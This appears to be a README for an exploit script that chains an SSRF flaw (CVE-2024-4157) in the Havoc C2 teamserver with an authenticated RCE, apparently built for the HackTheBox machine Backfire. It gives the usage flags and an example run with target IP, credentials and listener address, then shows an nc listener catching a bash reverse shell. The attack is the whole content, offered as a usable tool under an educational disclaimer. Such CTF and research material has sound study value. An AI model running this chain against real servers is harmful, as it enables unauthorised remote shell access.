Get reverse-shell with local IP and Port, chaining CVE-2024-4157 POC with havoc_auth_rce
- Basic info
$ python3 exploit.py
usage: exploit.py [-h] [-t TARGET] [-i IP] [-p PORT] [-A USER_AGENT] [-H HOSTNAME] [-u USERNAME] [-d DOMAIN_NAME] [-n PROCESS_NAME] [-ip INTERNAL_IP] [-U ADMIN_USERNAME] [-P
PASSWORD] [-l LOCAL_IP] [-lp LOCAL_PORT]
## -t: target IP where the C2 server is running on
## -i: internal IP address that we want the C2 server to interactive with (SSRF)
## -p: internal port
## -U: username to the C2 server
## -P: password to the C2 server
## -l: local address for the reverse shell (RCE)
## -lp: local port for the reverse shell- Example
$ python3 exploit.py -t https://10.129.150.254 -i 127.0.0.1 -p 40056 -U ilya -P 'CobaltStr1keSuckz!' -l 10.10.14.54 -lp 4444
[***] Trying to register agent...
[***] Success!
[***] Trying to open socket on the teamserver...
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to poll teamserver for socket output...
[***] Read socket output successfully!- Reverse shell on our
nclistener
$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.54] from (UNKNOWN) [10.129.150.254] 53352
bash: cannot set terminal process group (2933): Inappropriate ioctl for device
bash: no job control in this shell
ilya@backfire:~/Havoc/payloads/Demon$ - Credit to @chebuya with the SSRF, detailed blog on the vulnerability
- Credit to @Laurence Tennant with the RCE, detailed info on blog
- Credit to 0xdf with the amazing writeup on HTB Backfire
- This tool is for educational and research purposes only